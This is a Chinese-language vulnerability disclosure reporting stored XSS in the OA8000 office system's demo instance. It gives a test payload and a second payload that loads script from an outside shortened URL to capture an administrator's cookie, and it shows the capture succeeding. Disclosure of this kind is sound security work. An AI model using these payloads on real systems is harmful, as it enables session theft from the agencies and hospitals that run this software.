### 简要描述: 缺个移动硬盘存片子 ### 详细说明: 上次提交说是self-xss,为了证明不是self-xss,这次打一下管理cookie吧 demo演示,涉及大量政府,医院,房产,电视台等网站:http://www.oa8000.com/solution.htm [<img src="https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png) [<img src="https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png) [<img src="https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png) 首先还是来到官网,看到demo演示地址:http://demo.oa8000.com [<img...
### 简要描述: 缺个移动硬盘存片子 ### 详细说明: 上次提交说是self-xss,为了证明不是self-xss,这次打一下管理cookie吧 demo演示,涉及大量政府,医院,房产,电视台等网站:http://www.oa8000.com/solution.htm [<img src="https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png) [<img src="https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png) [<img src="https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png) 首先还是来到官网,看到demo演示地址:http://demo.oa8000.com [<img src="https://images.seebug.org/upload/201501/2009463643258959475cefe67358bd8f10de9724.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009463643258959475cefe67358bd8f10de9724.png) 然后先用官方提供的普通用户登录 [<img src="https://images.seebug.org/upload/201501/200946439e59f677d944e36a158bb6e4fcbd4596.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946439e59f677d944e36a158bb6e4fcbd4596.png) 存在XSS的地方在:客户管理--我的客户--新建 [<img src="https://images.seebug.org/upload/201501/20094652d6bd37746b4859c7dbea7055f5ba9abb.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20094652d6bd37746b4859c7dbea7055f5ba9abb.png) 这里新建一个客户,然后盲插一下= =:`"/><svg onload=alert(/1/)>` [<img src="https://images.seebug.org/upload/201501/200947009a016b4fe343cbf21135559eda89c5cc.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200947009a016b4fe343cbf21135559eda89c5cc.png) 保存后返回直接弹窗,本来以为就客户名称那里可以触发,没想到直接弹了4处= = [<img src="https://images.seebug.org/upload/201501/200947099bc4ab685780f9e7d2a461179469cb2d.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200947099bc4ab685780f9e7d2a461179469cb2d.png) 然后再点击进去查看一下,一共11处,均未做任何处理= = [<img src="https://images.seebug.org/upload/201501/20094720b7f835477e23481c6e882d6d0223e80b.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20094720b7f835477e23481c6e882d6d0223e80b.png) [<img src="https://images.seebug.org/upload/201501/20094731678f31c844c2499c3f737fd9d15a9173.png" alt="10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20094731678f31c844c2499c3f737fd9d15a9173.png) 接下来登录官方提供的管理员账号查看,成功弹窗 [<img src="https://images.seebug.org/upload/201501/200947482ae98228cb2b676e2740043614f73e6a.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200947482ae98228cb2b676e2740043614f73e6a.png) 然后返回普通用户后继续构造:`"/><script src=http://t.cn/RZW9FpT></script>`,这里是测试打cookie所以只插入一处XSS [<img src="https://images.seebug.org/upload/201501/200958211bebe6628519a1411fff942bc712218e.png" alt="12.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200958211bebe6628519a1411fff942bc712218e.png) 然后登录管理账号查看 [<img src="https://images.seebug.org/upload/201501/200959029380639348d3c2c5ff193ea1ee5a65b4.png" alt="13.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200959029380639348d3c2c5ff193ea1ee5a65b4.png) 来到收信平台后查看,cookie已经成功打到~ [<img src="https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png" alt="14.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png" alt="14.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png)